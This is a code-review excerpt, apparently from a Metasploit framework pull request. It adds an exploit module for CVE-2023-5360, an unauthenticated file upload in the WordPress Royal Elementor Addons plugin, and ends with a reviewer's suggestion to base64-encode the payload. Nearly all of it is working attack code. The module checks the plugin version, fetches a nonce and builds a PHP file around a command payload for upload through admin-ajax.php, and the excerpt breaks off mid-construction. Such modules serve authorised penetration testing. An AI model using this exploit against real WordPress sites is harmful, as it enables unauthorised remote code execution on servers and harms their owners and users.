modules/exploits/multi/http/wp_royal_elementor_addons_rce.rb

```diff
@@ -0,0 +1,140 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'WordPress Royal Elementor Addons RCE',
+        'Description' => %q{
+          Exploit for the unauthenticated file upload vulnerability in WordPress Royal Elementor Addons and Templates plugin (< 1.3.79).
+        },
+        'Author' => [
+          'Fioravante Souza', # Vulnerability discovery
+          'Valentin Lobstein' # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2023-5360'],
+          ['WPVDB', '281518ff-7816-4007-b712-63aed7828b34']
+        ],
+        'Platform' => ['unix', 'linux', 'win', 'php'],
+        'Arch' => [ARCH_PHP, ARCH_CMD],
+        'Targets' => [['Automatic', {}]],
+        'DisclosureDate' => '2023-11-23',
+        'DefaultTarget' => 0,
+        'Privileged' => false,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+  )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'The base path to the WordPress application', '/']),
+      OptBool.new('SSL', [true, 'Use SSL/TLS connection', true]),
+      Opt::RPORT(443)
+    ])
+  end
+
+  def check
+    return CheckCode::Unknown unless wordpress_and_online?
+
+    wp_version = wordpress_version
+    print_status("WordPress Version: #{wp_version}") if wp_version
+
+    check_code = check_plugin_version_from_readme('royal-elementor-addons', '1.3.79')
+
+    if check_code.code == 'appears'
+      plugin_version = check_code.details[:version]
+      print_good("Detected Royal Elementor Addons version: #{plugin_version}")
+      return CheckCode::Appears
+    end
+
+    return CheckCode::Safe
+  end
+
+  def exploit
+    print_status('Attempting to retrieve nonce...')
+    nonce = retrieve_nonce
+
+    print_status('Sending payload')
+    uri = normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php')
+
+    data = {
+      'action' => 'wpr_addons_upload_file',
+      'max_file_size' => 0,
+      'allowed_file_types' => 'ph$p',
+      'triggering_event' => 'click',
+      'wpr_addons_nonce' => nonce
+    }
+
+    file_content = '<?php '
+    file_content << (payload_instance.arch.include?(ARCH_PHP) ? payload.encoded : "system('#{payload.encoded}');")
```

Comment:
You might want to base64encode the payload before passing it to `system`, so that it can contain quotes.